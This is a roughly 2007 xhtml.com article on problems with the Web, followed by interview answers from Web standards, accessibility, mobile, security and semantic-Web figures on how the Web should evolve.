Extensible HyperText Markup Language

Fixing the Web - part 1

Does the Web need fixing?

The Web is about 17 years old. For its first 10 years, Web technology evolved at breakneck speed. But for the last 7 years, Web technology hasn't changed much at all. Is this a problem? There are clear benefits to having a stable development environment, but is Web technology stable or stale? Without innovation, will the Web suffer the same fate as any technology that becomes outdated because it fails to keep pace with users' needs?

The Web certainly performs adequately as an information source, but how well does Web technology itself work? To answer this question, let's looks at some problems with the Web:

Much of the Web is not accessible

Millions of people cannot participate fully online because most Web sites are built for people with perfect vision and the manual dexterity needed to operate a mouse.

The Web is not device-independent

Cell phones and other small-screen mobile devices capable of browsing the Web will soon greatly outnumber desktop computers. Yet most Web sites are designed for large-screen monitors, making it extremely difficult to browse the Web using mobile devices.

Web best practices are difficult to master

The fundamentals of Web technology are easy to understand. As a result, even novices can build Web sites. But building a usable, accessible and device-independent Web site is quite challenging. Understanding how to use X/HTML correctly and mastering CSS and JavaScript can involve a steep learning curve.

Web design is a challenge

Though it's possible to build very attractive sites using current Web technology, some of the more attractive and interactive visual effects can only be achieved through browser plug-ins like Flash. Even basic effects such as drop shadows and rounded corners are not possible in a cross-browser environment, or are done using hacks.

Web application development is a challenge

Current Web technology limits the functionality of Web applications compared to desktop applications. Web developers have fewer form controls to choose from, and basic features one expects from a network application are not possible in a Web environment. For example, it is not possible to get an accurate count of active users using a Web application at any given time, because of the stateless nature of HTTP. Or servers cannot send a message to all active users of a Web application, because communication can only be initiated by a client computer.

Web internationalization is a challenge

One would expect that a global information system like the Web would be built with equal support for all of the world's languages. Unfortunately, much Web technology is still ASCII based. Aside from architectural issues such as supporting non-ASCII characters in URLs, Web content is riddled with cryptic entities (such as ä) and Numeric Character References (€) instead of natural language (such as Greek or Russian), which makes content less human readable and more difficult to maintain.

Interoperability is a challenge

Building Web sites and applications that work equally well in different Web browsers is a challenge. Browser vendors are hesitant to fix certain bugs because many Web sites have been developed that rely on buggy or incorrect behavior. Many developers also build Web sites for specific browsers or screen resolutions. Many Web sites still bare notices that read "Best Viewed With Browser X".

Data on the Web cannot be repurposed

One of the expected benefits of the Web as a digital medium is that data can be repurposed. For example, an article written for one Web site can, in the future, be re-published on other sites, printed in a magazine, or added to a knowledge base in a desktop application, all without manually reformatting or restructuring the data. Unfortunately, current Web technology encourages Web page layout to be fused with content, and content to be fused with formatting. As long as this continues, the promise of data repurposing can never be realized.

The Web is not secure

Web technology is susceptible to easy hacking techniques. This can be as simple as modifying the query string in URLs or saving a local copy of an X/HTML page containing a form, modifying it, and sending data to the server from a local copy. Web developers need to be experts in security in order to overcome the open nature of Web technology.

Web technology is susceptible to mischief

Publishers on the Web are exposed to mischief such as email address harvesting by bots, spamming through HTTP referrer headers, or bots that fill out Web forms. Publishers themselves also abuse Web technology for the purpose of fooling search engines or extracting private data from Web visitors.

The Web is not machine friendly

People are capable of deriving information or meaning from data just by looking at it. Machines on the other hand need data to be well structured in order to process it correctly. Since data on the Web is very poorly structured, machines cannot derive meaning from it. Why is this important? Because people retrieve information on the Web using search engines which are machines. If machines can't make sense of Web site data, then the search results you get back from search queries are not going to be the most relevant ones.

Given these and other problems with the Web, do we need new technology, or can current Web technology evolve to address such problems?

Interviews with technology stakeholders in the Web

In this section, xhtml.com asks a diverse group of stakeholders in Web technology to share their thoughts on how to address current challenges the Web faces, in order to transition to the Web of the future. Each participant in this interview is asked the same question:

"In your opinion, what parts of the Web need to be improved or fixed in order for the Web of today to evolve into the Web of the future?"

Chris Wilson

Photo: Chris Wilson.In 1993 and '94, Chris Wilson wrote the first major implementations of CSS. In 1995, Chris joined Microsoft as a developer. He is now Platform Architect of the Internet Explorer Platform team, where he has always pushed for the inclusion in IE of the latest technologies. In the last several years, Chris and his team have spent a lot of time listening to and addressing the needs of the diverse IE user base made up of nearly 500 million people. In 2007, Chris became co-chair of the HTML Working Group at W3C. Chris writes:

The Web has tended to evolve in a very smooth way—there are few sharp inflection points to the evolution of the Web. I don't think there is any single glaring problem that is preventing the Web from continuing to evolve; the Web has a way of evolving around problems.

Probably the biggest challenge on the Web today revolves around interoperability, compatibility and standards compliance. All the major browser vendors (including Microsoft) have stated and demonstrated a commitment to interoperability and standards compliance. However, some believe that should come at the cost of backwards compatibility. I don't agree with that; one of the tenets that Microsoft holds dear is that content and applications should continue to work, even when new platforms are deployed.

A second, somewhat related problem is that of browser deployment and the Balkanization of versions in play. Every browser contains two completely different things—a browser user experience and an implementation of the Web platform (HTML, CSS, etc.). Users typically upgrade to the next browser for a better user experience. Web developers care about the Web platform, of course, and it's hard to upgrade users to a new Web platform if they are comfortable with their current user experience. This leads to a reliance on Web frameworks for Web developers—they can get a lot of new functionality, and be confident it will work even on older browsers. This means the innovation in the browser Web platform has a very long latency—even if we add major functionality to the next version of IE, it can be years before web developers can rely on it.

So in short, I think the biggest challenges in evolving the Web are a long latency in browser deployment, and the necessity of evolving the Web in a non-destructive way.

Daniel Glazman

Photo: Daniel Glazman.In 2000, Daniel Glazman joined Netscape Communications where he implemented new features in both the CSS engine and the HTML editor called Composer. After the fall of Netscape in July 2003, Daniel founded Disruptive Innovations and lead development of the popular standalone WYSIWYG Web page editor NVu. In September 2006, Daniel announced he was working on NVu's successor, Composer 2.0, as a Mozilla project, and promised "...it will be something totally new, entirely rewritten, and the feature list will make Nvu look like a prehistoric web editor..." Daniel is a CSS Working Group member at W3C and a contributor to the HTML Working Group. Daniel writes:

First, I think the World Wide Web is a rather mature technology, given its age and the number of users around the world. It works and it works beautifully for the vast majority of people. Corporations and governmental organizations providing online services want to improve the Web but it's not as if the Web as it is today was not enough for our daily needs. So what can we do to improve the service provider-user relationship? What can we do to help Web authors? What can we do to offer a new range of services?

What we needed most is the acknowledgement that the Web is based on HTML 4, CSS, JavaScript and a few other technologies. That is now done, the W3C working on a successor to HTML 4 based on the work done by the WHAT-WG. XHTML 2 is not the future of the Web. Good :-)

Then we need better forms. A Web author is fighting on a daily basis with HTML forms because they're not enough, because they cannot easily represent corporate needs. We also need to preserve the original spirit of simplicity of HTML so the learning curve of the new language does not drastically differ from HTML 4's.

We probably need to improve a lot CSS, because CSS as they are today have intrinsic constraints inherited from a past when CPU and memory was expensive. I understand mobile devices still have these constraints but situation is improving every day.

Finally, browser vendors need to understand the impact of Web 2.0 and find solutions so features like the Back button still work even if a Web page is downloading data through XMLHttpRequest.

As a conclusion, I would say the Web only needs evolution, not revolution.

Joe Clark

Photo: Joe Clark.Joe Clark is a Web standards and accessibility advocate, consultant and speaker and is enormously knowledgeable about the Web. His passionate style and commitment have earned him a large and loyal following of Web developers. Joe is the author of the highly informative book Building Accessible Websites and of hundreds of articles. Joe writes:

Training of developers. We may not need actual certification, though that shouldn't be dismissed out of hand. [The province of] Ontario [in Canada] has a registry of graphic designers, for example. It's the only place in North America that does, and it's a potential model.

We need some kind of program to fire all the teachers at podunk community colleges who are still teaching tables and spacer GIFs, replace them with people whose skills have evolved since 1997. Then we'll insist that existing developers improve their skill level and become at least as good at standards-compliant development as we are. And if they won't upgrade their skills, let's fire them, too. They're in the wrong business.

Doug Geoffray

Photo: Doug Geoffray.Doug Geoffray is co-owner of GW Micro that makes the popular screen reader Window-Eyes that allows blind and visually impaired users to participate in the Web. Invited to speak at Yahoo's internal front-end engineering conference in March 2007, Doug was described as a "touchstone" resource for assessing the current state of screen reader technology and the challenges faced in developing screen-reader-accessible dynamic Web pages. Doug writes:

The biggest hurdle facing future Web development resides in the education of Web developers regarding disabilities that challenge standard Web access methods along with discerning and implementing accessibility solutions that already exist.

The technology used to design, implement, and ultimately view Web based information (i.e. browsers, authoring tools, development platforms, etc.) will be void of accessibility issues if developers understand accessibility characteristics early on in the design process.

Just as curb cuts allow wheelchair users access to sidewalks, accessibility solutions need to be built in from the ground up, not as an after thought. It is not, however, within the AT's scope to interpret and parse information in order to make the inaccessible more accessible (although many times, hacks must be included to keep people with disabilities from being excluded).

Take, for example, the simplistic notion of attaching alternative text to a graphical link. A developer who understands the importance of alternative text, and knows how to apply the information, can create efficient, navigable interfaces with clear and easy to understand link names without sacrificing visual appeal. A developer who is unfamiliar with the necessity of alternative text would create an interface that, while visually pleasing, is a confusing tangle of unintelligible links for someone who is visually impaired. Imagine a screen reader user hearing clear-cut information like, "Home, Products, or Catalog" when navigating through links on a page, versus imperceptible information like, "/index.php?dir=1, /prod/www/2007pubs/, or /images/tn2115_ColorMatchedImage.jpg."

The Internet allows people with disabilities a far greater reach than physical access. Web based technology is driven to reach the end users, and end users long to reach out through Web based technology. It's a symbiotic relationship that drives the need for newer and better solutions. Understanding the need for accessibility solutions early in the development stage of any technology is crucial for the future of Web development.

Roberto Scano

Photo: Roberto Scano.Roberto Scano represents the IWA/HWG inside W3C, and is a member of the WCAG and ATAG Working Groups at W3C. In 2002, Roberto developed the first Italian accessibility law project (the "Campa-Palmieri Act"). Roberto is the author of Accessibility: from theory to reality and developer of the CMS called Fruibile. Roberto writes:

Fixing the Web is extremely difficult, because the Web evolves every day, every hour. I think that one big problem for today's Web is the fact that Web content creators (Web developers, and also non-technical content creators who use CMS) don't understand the importance of structure in a document. Many don't know the correct use of headings and other elements and so are unable to generate content that can be clearly identified by search engines and assistive technologies and that cannot be reused. Today the Web offers full interaction with users: text, images and, videos. If we don't use tools today to make sure this content is standards-compliant, then all of this content will need to be reorganized in the future as technology advances. To avoid this, new technologies for managing content should use XML for storing data, and allow users to visualize and personalize data.

New specifications are coming up that will ensure Web content (WCAG and ISO 9241-151) and Web applications (ATAG and WebApp) are more accessible. But it is important that companies that develop Web applications think "with accessibility and reusability in mind". As I mentioned before, this will help search engines to index Web content, help users browse content, and help people with disabilities to live the Web experience. If we follow these suggestions, we will have a superior Web that is more accessible, easier to interact with and one that permits better data exchanges. Remember, the Web is what we make it.

Jeffrey Veen

Photo: Jeffrey Veen.Jeffrey Veen leads a team of over 30 designers and researchers at Google who focus on improving the user experience of Google applications. Jeffrey's passion for integrating content, graphic design, and technology from a user-centered perspective has earned him his reputation as an internationally recognized speaker and consultant on the Web user experience. Jeffry also authored "The Art & Science of Web Design" and "HotWired Style: Principles for Building Smart Web Sites". Jeffrey writes:

I wish every device that was capable of talking to the network could send its geolocation. I'd like this to be fundamental—let's send longitude and latitude in the HTTP header of every request. Let's make it as ubiquitous and accessible as the time stamp, user agent, and referring URL.

When location is assumed, we can go beyond the obvious applications of a geo-aware Web. Yes, the map application will be able to center on you when you launch it. But what else becomes possible when email knows where you were when you sent it, or a social app knows the proximity of your friends? We can't even begin to imagine what will emerge.

But what about the security and privacy implications? We've been dealing with them since the first Web sites launched. Issues with cookies, cross site scripting, and search query logs have given us precedent for enhancing rather than exploiting personal data. Giving users control of their location can learn from the same paths.

There are hurdles, to be sure. Hardware manufactures still believe access to location data should be a business opportunity, much like software companies once believed proprietary file formats would protect their bottom line.

That's a shame. The Web grew to prominence providing the "what" and knowing the "who." Let's add the "where" and see what happens next.

Dave Raggett

Photo: Dave Raggett.Dave Raggett is employed by Volantis Systems but works on assignment to the W3C as a member of the Ubiquitous Web Domain team. The Ubiquitous Web team focuses on technologies that enable Web access for anyone, using any device. Dave has been closely involved with the development of Web standards since 1992, contributing to work on HTML, HTTP, MathML, XForms, and is recognized internationally for his development of W3C's hugely popular HTML Tidy utility, which is designed to clean up bad HTML and in the process improve the accessibility of HTML documents. Dave writes:

For many people, the Web today is still about what you can access from a desktop or laptop browser with a large screen. There is limited awareness of Web access from mobile devices and the challenges facing people with disabilities, but few people are aware of the broader potential. One success story has been the application of Web technology to voice based services with VoiceXML and its related specifications. This represents a convergence of the Web and the telephone. Large businesses are exploiting VoiceXML to handle a wide range of calls, and we can expect to see this spread to medium and small businesses, as all businesses need to provide phone access in addition to conventional visual Web pages.

Moore's law is driving down the cost for adding networking capabilities to all kinds of devices whether in the home, at work, or on the move. Web technologies have the potential for simplifying the task of developing applications that work across a mix of product generations, vendors and networking technologies. This is the focus of W3C's new Ubiquitous Web Applications Working Group. Some of the challenges it faces include: usable security, remote user interfaces (e.g. controlling your home from your television or smart phone), enabling applications to dynamically adapt to changes in user preferences, device capabilities and environmental conditions, the ability to combine local and remote services, and the potential for applying markup for agents that act on behalf of users, either in local devices, or on remote Web sites.

Web applications are increasingly complex and costly to develop and maintain. There is a huge potential for easier to use tools that exploit declarative techniques to capture what you want to happen, but which don't require you to provide all the details of how. Developers shouldn't be required to know the ins and outs of (X)HTML, CSS, the DOM and all the messy variations across browsers. W3C is leading the way towards a future where many more people will be able to develop a much broader range of applications that you can only dream about today.

Mike Andrews

Photo: Mike Andrews.Mike Andrews is a security expert and a principal at Foundstone, a McAfee company that offers products, services and education designed to optimize network security. At Foundstone, Mike leads the Web Application Security Assessments team and teaches hacking classes that help security professionals and application designers recognize and protect against system vulnerabilities. His many speaking engagements include his "must see" April 2006 Google Video presentation "How To Break Web Software—A look at security vulnerabilities in web software". Mike is also the author of "How to Break Web Software: Functional and Security Testing of Web Applications and Web Services". Mike writes:

From a security perspective, the Web of today is pretty badly broken. There's the obvious refrain of input validation (which in many cases is harder than people imagine), and all the vulnerabilities that would disappear if it was done fully and correctly, but let's pick on one vulnerability for now: cross-site scripting and its many variations.

Cross-site scripting comes about because one of the main tenants of security is broken in HTML—never mix code and data. Code, in the form of JavaScript (or VBScript, etc) can be interspersed in the "data" of HTML, the mark up of a page, in so many places; script blocks, attribute tags, style sheets, etc, etc. With this amount of opportunity there are so many alternative ways of getting malicious code into a page where it can perform different actions for different attacks. With just a small flaw in a Web application one can write code that would modify a page's content for a phishing attack, access cookies for session hijacking, create HTTP requests for cross-site request forgeries. Researchers are pushing the boundaries even further now where JavaScript can be used to scan an internal network, fingerprint servers, create and control worms, and perform password cracking/brute forcing.

So, if there was one thing that I would like fixed or improved in the Web of tomorrow is greater control on where code could exist in a page, and some verification on where that code came from. This would allow for developers to have a much easier time of validating inputs and for users to have more "trust" in a page that they are visiting that it's not doing something malicious behind their back.

James Pearce

Photo: James Pierce.James Pearce is vice president of technology at dotMobi, the official worldwide registry for the .mobi domain. James is responsible for dotMobi product and technology roadmaps and steers dotMobi's initiatives that aim to provide developers with the information and tools they need to build a faster, more reliable mobile Internet experience. James writes:

Fundamentally this question assumes that the Web can be consciously improved or fixed at all! In fact the Web on any given day is really just the result the motivations of the people and organizations that have created content and services on, and via, it.

We believe that the evolution of the Web to become mobile is absolutely inevitable. In the future we will look back at ourselves in the early years of the 21st century and laugh that we used to have to sit at a lonely PC screen to enjoy our on-line existence. That will seem as antiquated and quaint as the idea of the 1950s family gathering around a box radio in their sitting room to listen to music.

The Web will lose the shackles of immobility and start to meld itself ever seamlessly around our human life, which of course, is rarely static for very long.

The Web's technology will not need to evolve very much to start working well on mobile handsets (which have increasingly reliable browsers); however it needs to be used in a sympathetic way. There's no point going crazy and showing off with bloated heavyweight content, not because of network speed, but because users on the move are by definition impatient and want to cut to the chase.

That makes mobile Web development quite a cathartic experience: in fact there's a certain Zen in creating a streamlined on-line service that is primarily designed for mobile.

But ultimately the successful content and services of the coming years will be those that not only take the mobile browser's behaviour into consideration, but which are primarily aimed at users in the mobile context. Not surprisingly, users rarely want to have pieces of a large Web presence squeezed down to their mobile phone—they rather want a compelling and beautifully designed web that suits their mobile lifestyle.

So my answer to your question is this: for the mobile Web (which is the Web of the future), Web developers should think different.

Nova Spivack

Photo: Nova Spivack.Nova Spivack co-founded one of the first Internet companies, EarthWeb, in 1994. When he left EarthWeb in 1999, Nova's subsequent involvement in technology startups and incubators, plus his enduring interest in cognitive science and artificial intelligence, led him to found Radar Networks. Radar Networks (of which Nova is CEO) is developing a new online service based on the semantic Web that will help people work with information more productively on the Web. The service combines human-powered collective intelligence with artificial intelligence to learn about and make sense of information on the Web. Nova has co-authored several books on Internet strategy and technology, is a sought-after media source and speaker on future-pointing technologies. His weblog, Minding the Planet, focuses on Radar Networks and emerging technologies. Radar Networks' first product is scheduled for launch in Fall 2007. Nova writes:

Personally, I'm working on the Semantic Web, so I think that the Web could benefit greatly from more semantic structure. By adding richer semantics to the data of the Web, the Web could become more precisely searchable and navigable by humans, and software agents could more easily mine it and form new layers of knowledge on top of it. This would transform the Web into a much richer and more connected knowledge commons. Today the Web is primarily authored and maintained by humans, but with the addition of richer metadata—such as RDF and OWL metadata—it will start to be authored and maintained by software agents as well. This will enable the Web to start to evolve faster and more profoundly. Agents will be able to crawl the Web looking for new connections between things, as well as for new entities and interesting assertions and facts—and when they find them they will be able to create new resources, annotations, or links that embody them.

I envision a Web that combines the best of human-powered social filtering and tagging with automated filtering, mining, learning and tagging by software agents—a Web that learns and self-optimizes in a manner that will resemble something like the human brain, on a global scale. But to reach this point we have much to do. RDF has barely been adopted at all outside of academic and government circles. OWL is only starting to really be applied. There are few examples of "killer apps" of the Semantic Web so far (but at Radar Networks, we will be launching one soon...). Currently the Web is like a giant distributed file server, but with the addition of RDF it will become more like a giant distributed database. This will take time—perhaps 10 years or more. But the process is already starting today.

Mark Birbeck

Photo: Mark Birbeck.Mark Birbeck has spent the last 7 years designing, building and thinking about dynamic user interfaces. His aim is to build the framework for a new generation of Internet applications, where the user interface changes automatically, based on the data being interacted with. His expectations are that such a framework will dramatically increase programming productivity, and open the world of application building to many more people. Mark is an invited expert on W3C's XForms and XHTML 2 Working Groups, and his companies have created formsPlayer, an XForms processor for IE, and Sidewinder, a next-generation semantic Web browser, that seamlessly combines XForms with languages such as SVG, MathML and X3D. Mark writes:

I actually have a very positive view of the transition to the 'future Web', and I see many of the things that one might say we need for a better Web already emerging. For example, we need the differences between browsers to be removed, but due to the high quality of libraries such as YUI, Dojo, and Prototype this is well underway. We also need there to be a convergence of application development techniques, so that the same languages can be used for the Web, desktop applications, gadgets, widgets, and so on; but with an explosion of interest in HTML, JavaScript and XForms—as well as the appearance of multi-language platforms like Silverlight—this trend also looks set to continue.

So whilst I might say that these things are crucial to the future of the Web, they are also very much underway, and barring a collective overnight loss of memory by the development community, look certain to continue. But there is one thing that to me doesn't look so assured, and that is whether standards are agreed upon around Ajax, and more generally, the whole approach to standards development.

In general, standards (at least those from the W3C) are developed in a kind of 'kitchen-sink' style, where some specification tries to include just about everything that can be devised on a particular topic—and therefore takes years to write. A good example is SVG, and even, to some extent, my own favorite, XForms. In both cases there are many useful things that could be factored out of these specifications to be made available elsewhere as smaller, more manageable components, but it is only recently that this approach has started to be tried. Good examples of the 'bite-size' approach are the 'role attribute', 'access', and RDFa, which provide techniques for adding metadata to web documents as well as making them more accessible.

A good measure that some are learning that this is a promising approach to writing specifications is the backplane initiative at the W3C. But unfortunately, an illustration that lessons haven't been learned is the W3C's embracing of HTML 5, which is not only a case study in kitchen-sink design—let's throw everything in there—but a case study too of the problems caused by the 'not invented here' mindset.

If the W3C continues to support the creation of enormous specifications that take years rather than months to complete, then it will almost certainly become increasingly irrelevant to the 'future Web'. Of course, based on the W3C's lack of coherent leadership around the whole HTML 5 question, some might not see that as necessarily a bad thing, but it does raise the question as to whether other organizations can fill the space with a better process. For example, can the Open Ajax Alliance take a much more focused approach to standards writing, creating small specifications that can be easily combined? If so, it's possible that the vacuum would be filled, and the future of the 'future Web' would stand on a firmer footing.

Whilst I'm not quite sure where the future of standards creation will come from, the sheer dynamism we see in the Web development space makes me certain that it is imminent. If we can devote even a fraction of that creative energy for evolving a new approach to standards development, the future of the 'future Web' looks very bright indeed. But if we don't, then for the foreseeable future we are looking at increasing fragmentation, and the lack of standardization in the browser merely being transferred to a 'lack of standardization in the libraries'.